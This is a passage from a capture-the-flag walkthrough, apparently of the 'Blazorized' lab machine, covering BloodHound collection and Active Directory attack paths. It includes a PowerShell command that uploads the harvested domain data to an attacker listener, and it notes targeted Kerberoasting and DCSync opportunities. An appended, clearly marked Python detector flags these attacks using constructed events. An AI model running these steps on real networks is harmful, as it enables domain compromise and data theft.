BloodHound
BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.
Ingestion
Although there is already a PowerShell session open from the initial foothold, SharpHound has been executed as part of the adPEAS script
Since file transfer over SMB is not possible, I will use a simple Python script that supports the POST method to transfer the ingested domain data file
This.
PS C:\tmp> iwr -Uri 'http://10.10.14.110:2222' -Method POST -InFile blazorized.htb_20240702081301_BloodHound.zip
Transferred
Received
Prep
Ingested domain data uploaded
nu_1055
The nu_1055 account has the WriteSPN privilege over the rsa_4810 account, which essentially amounts to targeted Kerberoasting of that account
This was also picked up by adPEAS earlier
rsa_4810
The rsa_4810 account is part of both the Remote Management Users and Remote_Support_Administrators groups. The user is able to WinRM to the dc1.blazorized.htb host
ssa_6010
The ssa_6010 account is a member of the BUILTIN\Remote Management Users and BLAZORIZED\Super_Support_Administrators groups
The ssa_6010 account also has the DCSync, GetChangesAll, and GetChanges privileges through its membership in the Super_Support_Administrators group
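Detection view of the two edges above (WriteSPN on rsa_4810, replication rights for ssa_6010), as an added example that is not part of the original writeup. It assumes directory-service auditing is enabled and that events 5136 and 4662 have been parsed into dictionaries keyed by their EventData field names; the sample records, including the object DNs, are constructed.

```python
# Added example: flag an SPN written to a user object and replication rights
# exercised by a non-DC account. All sample events below are constructed.

# Control-access right GUIDs for directory replication (AD schema constants).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
VALUE_ADDED = "%%14674"  # OperationType in event 5136 meaning "Value Added"

def detect(events, domain_controllers):
    """Return (rule, actor, detail) tuples for suspicious events."""
    dcs = {name.lower() for name in domain_controllers}
    alerts = []
    for ev in events:
        actor = ev.get("SubjectUserName", "")
        if ev["EventID"] == 5136:
            # SPN added to a *user* object: precondition for targeted Kerberoasting.
            # SPN changes on computer objects are routine and are ignored here.
            if (ev.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"
                    and ev.get("ObjectClass", "").lower() == "user"
                    and ev.get("OperationType") == VALUE_ADDED):
                alerts.append(("spn-added", actor, ev.get("ObjectDN", "")))
        elif ev["EventID"] == 4662:
            props = ev.get("Properties", "").lower()
            rights = sorted(n for g, n in REPL_GUIDS.items() if g in props)
            # Replication between DCs is normal; anything else resembles DCSync.
            if rights and actor.lower() not in dcs:
                alerts.append(("dcsync", actor, ",".join(rights)))
    return alerts

SAMPLE_EVENTS = [  # constructed records, not taken from the target host
    {"EventID": 5136, "SubjectUserName": "nu_1055", "ObjectClass": "user",
     "ObjectDN": "CN=RSA_4810,CN=Users,DC=blazorized,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "DC1$", "ObjectClass": "computer",
     "ObjectDN": "CN=DC1,OU=Domain Controllers,DC=blazorized,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "OperationType": VALUE_ADDED},
    {"EventID": 4662, "SubjectUserName": "DC1$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "ssa_6010",
     "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, ["DC1$"]):
        print(alert)
```
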